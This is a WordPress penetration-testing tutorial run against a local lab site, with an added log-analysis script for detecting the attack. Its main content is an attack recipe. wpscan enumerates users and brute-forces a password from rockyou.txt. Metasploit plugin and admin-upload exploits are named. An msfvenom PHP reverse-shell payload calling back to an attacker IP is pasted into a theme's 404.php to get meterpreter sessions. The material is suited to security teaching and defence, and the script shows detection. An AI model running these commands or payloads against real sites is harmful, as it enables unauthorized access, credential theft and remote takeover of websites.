Wordpress penetration testing
In this article we will see how to enumerate a WordPress website and how to find the login credentials of a particular website. In this tutorial we will use the wpscan tool available in Kali Linux.
Table of Contents:
Introduction to WPscan
Normal Scan
Enumerating plugins
Enumerating vulnerable plugins
Enumerating themes
Enumerating vulnerable themes
Getting a session using metasploit
Enumerating users and finding credentials
Uploading a file to get reverse shell
Uploading a payload
Introduction to WPscan
Use this command to get the latest version: git clone https://github.com/wpscanteam/wpscan.git. Then change directory to wpscan using the cd command, go to the bin directory, and from there we will execute wpscan.

This tool performs black-box testing to find vulnerable WordPress themes, plugins and versions.
Normal Scan
In this section we will try to find the WordPress version by using a simple command.
We have detected the WordPress version successfully. Command used:
./wpscan --url http://127.0.0.1
Please change the URL to that of the targeted website. As I am hosting a WordPress website on my local machine, I have used this URL.

Enumerating plugins
Plugins are small pieces of code which can be added to a WordPress website to extend its functionality.
With the help of the command: ./wpscan --url http://127.0.0.1 --enumerate p
we can easily find the installed plugins on the target WordPress website, as shown in the image.

Enumerating vulnerable plugins
In this case only a single plugin is present, so it is not a problem, but even that one plugin can be vulnerable. If we detect many plugins, then by running the command
./wpscan --url http://127.0.0.1 --enumerate vp
we can detect vulnerable plugins installed on the WordPress website.

Enumerating themes
A theme controls the overall look of the website, like the font, font colour, font size and other things.
Now in the same fashion we can detect the WordPress themes installed. Command used:
./wpscan --url http://127.0.0.1 --enumerate t

Enumerating vulnerable themes
To scan for installed vulnerable themes on the WordPress website, type the following command: ./wpscan --url http://127.0.0.1 --enumerate vt

No vulnerable themes found.
Getting a session using metasploit
We have detected a vulnerable plugin, so after searching in metasploit we found an exploit for the vulnerable plugin, and we will use that exploit to get a session.
Exploit used: exploit/unix/webapp/wp_reflexgallery_file_upload


We can see that we have successfully opened a meterpreter session.
Enumerating users and finding credentials
There is a login page on a WordPress website for the admin panel, from where we can control the complete website, and it is http://127.0.0.1/wp-login.php

Now to log in to the main panel we need a username and password, and for that we first need to find the username. To find the username we will use the command:
./wpscan --url http://127.0.0.1 --enumerate u

There exists a user with the username haclabs. So it's time to find the password for this user "haclabs", and for that we will use a brute-force approach using the wordlist /usr/share/wordlists/rockyou.txt
Command used: ./wpscan --url http://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -U haclabs

username : haclabs
password : 987654321
Done!! We now have the user credentials and we can use them to log in to the main panel of the website.
Uploading a file to get reverse shell
In this section we are going to create a malicious PHP file that will give us a shell when executed on the website. Let's create the file first using msfvenom.
Command used: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -f raw
where lhost is the IP of your Kali Linux machine (attacker machine) and lport is the port to listen on.

Now copy the highlighted part. Next we go to the page http://127.0.0.1/wp-login.php to log in to the panel using the credentials we found earlier.

We can see that after using these credentials we logged in successfully.

Now go to Appearance -> Theme Editor -> select theme to edit, then select the theme which is currently active, then go to the 404 Template to edit the file 404.php and paste the malicious code there.

Click on Update File. Now we will open metasploit to get the session; first of all let's set up everything, and then we will execute this template by using the link: http://127.0.0.1/wp-content/themes/online-portfolio/404.php
In this case the activated theme is online-portfolio, so please change it to the name of the currently active theme if it is different from this; otherwise everything will remain as it is.

We succeeded in getting a meterpreter session!
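As an added example (not code from the original article), here is a small Python script that reads Apache access-log lines and flags the traces the two previous sections leave on the target: the ?author= and REST users requests behind --enumerate u, the repeated POSTs to wp-login.php from the brute-force step, and a direct request to a theme's 404.php like the one used above. All log lines are constructed, and the WPScan user-agent string is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined-log format (not from the article).
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.22"',
     '10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 512 "-" "WPScan v3.8.22"']
    + [f'10.0.0.5 - - [10/Mar/2024:12:00:{10 + i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "WPScan v3.8.22"'
       for i in range(8)]
    + ['10.0.0.5 - - [10/Mar/2024:12:01:00 +0000] "GET /wp-content/themes/online-portfolio/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
       '192.168.1.20 - - [10/Mar/2024:12:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
       '192.168.1.20 - - [10/Mar/2024:12:02:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# The two routes that wpscan --enumerate u relies on to list usernames.
USER_ENUM_RE = re.compile(r'^/\?author=\d+|^/wp-json/wp/v2/users')
# A PHP file inside a theme directory fetched directly: WordPress renders templates
# through index.php, so a hit like this is how an edited 404.php gets executed.
THEME_PHP_RE = re.compile(r'^/wp-content/themes/[^/]+/[^?]*\.php')

def analyse(log_text, login_threshold=5):
    # Per-source-IP counters; returns a list of (ip, reason) alerts.
    per_ip = defaultdict(lambda: {"enum": 0, "logins": 0, "theme_php": [], "scanner": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format, skip
        rec = per_ip[m["ip"]]
        if USER_ENUM_RE.match(m["path"]):
            rec["enum"] += 1
        if m["method"] == "POST" and m["path"].startswith("/wp-login.php"):
            rec["logins"] += 1  # every password guess is one POST to wp-login.php
        if THEME_PHP_RE.match(m["path"]):
            rec["theme_php"].append(m["path"])
        if "wpscan" in m["ua"].lower():
            rec["scanner"] = True
    alerts = []
    for ip, rec in per_ip.items():
        if rec["scanner"]:
            alerts.append((ip, "WPScan user-agent"))
        if rec["enum"] >= 2:
            alerts.append((ip, "user enumeration"))
        if rec["logins"] >= login_threshold:
            alerts.append((ip, f"{rec['logins']} POSTs to wp-login.php (brute force)"))
        for path in rec["theme_php"]:
            alerts.append((ip, f"direct request to theme PHP file {path}"))
    return alerts
```

On the sample the scanner host gets all four alerts while the normal visitor who logs in once gets none. Rate-limiting wp-login.php and disabling the theme editor (the DISALLOW_FILE_EDIT constant in wp-config.php) are the usual mitigations for the last two findings.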
Uploading a payload
We know the credentials of the user haclabs, so here we are going to upload a payload to get a meterpreter session by using the exploit: exploit/unix/webapp/wp_admin_shell_upload

And exploit!! We have a meterpreter session!!!

So this was all about WordPress penetration testing.